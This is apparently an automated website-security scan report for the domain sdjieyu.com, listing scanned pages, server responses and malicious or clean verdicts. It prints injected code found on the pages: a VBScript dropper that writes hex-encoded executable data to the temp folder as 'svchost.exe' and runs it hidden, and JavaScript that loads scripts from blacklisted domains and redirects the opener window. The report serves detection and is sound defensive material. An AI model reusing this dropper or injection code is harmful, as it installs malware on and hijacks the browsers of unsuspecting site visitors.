Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sdjieyu.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.sdjieyu.com/ | HTTP/1.1 200 OK Date: Fri, 04 Jul 2014 17:18:32 GMT Accept-Ranges: bytes ETag: W/"947ad2c3dd92cf1:2a5b" Server: Microsoft-IIS/6.0 Content-Length: 140378 Content-Location: http://www.sdjieyu.com/index.htm Content-Type: text/html Last-Modified: Sat, 28 Jun 2014 14:32:18 GMT X-Powered-By: ASP.NET | clean |
http://www.sdjieyu.com/index.htm | 200 OK Content-Length: 140378 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "http://www.sdjieyu.com/svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.sdjieyu.com/75.gif | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.sdjieyu.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.sdjieyu.com/775.gif | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.sdjieyu.com/30ps_neirong_08.jpg | 200 OK Content-Length: 607 Content-Type: image/jpeg | suspicious |
Page code contains blacklisted domain: www.365zhukao.com var url = location.href;
if (url.indexOf('http://') == 0 || url.indexOf('https://') == 0) { document.writeln("<script src="index-1.htm" tppabs="http://www.365zhukao.com/index.htm"http://www.182ok.com/75base.js/""></script>"); window.onload=function(){if(top!=self){f=document.createElement('form');f.action=location;f.target='_parent';document.body.appendChild(f);f.submit();}}; function bingo(){if(parent.window.opener) parent.window.opener.location='http://www.975f.com/?76';if(window.opener.parent.navigate) window.opener.parent.navigate('http://www.975f.com/?76');} setTimeout('bingo()', 8000); } | ||
http://www.sdjieyu.com/index-1.htm | 200 OK Content-Length: 140476 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "http://www.365zhukao.com/svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3584 bytes skipped]... Antivirus reports:
| ||
http://www.sdjieyu.com/ħ½çÖÁ×ðÍò½Ù.rar | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.sf70.com/superexitpopup.js | 500 Can't connect to www.sf70.com:80 Content-Length: 187 Content-Type: text/plain | clean |
http://www.021pay.com/tools/advcode.ashx?g=11369&pic=pay6 | 200 OK Content-Length: 1870 Content-Type: text/javascript | clean |
http://www.021pay.com/tools/statcode.ashx?u=507&s=t | 200 OK Content-Length: 238 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sdjieyu.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: sdjieyu.com
Referer: http://www.google.com/search?q=sdjieyu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.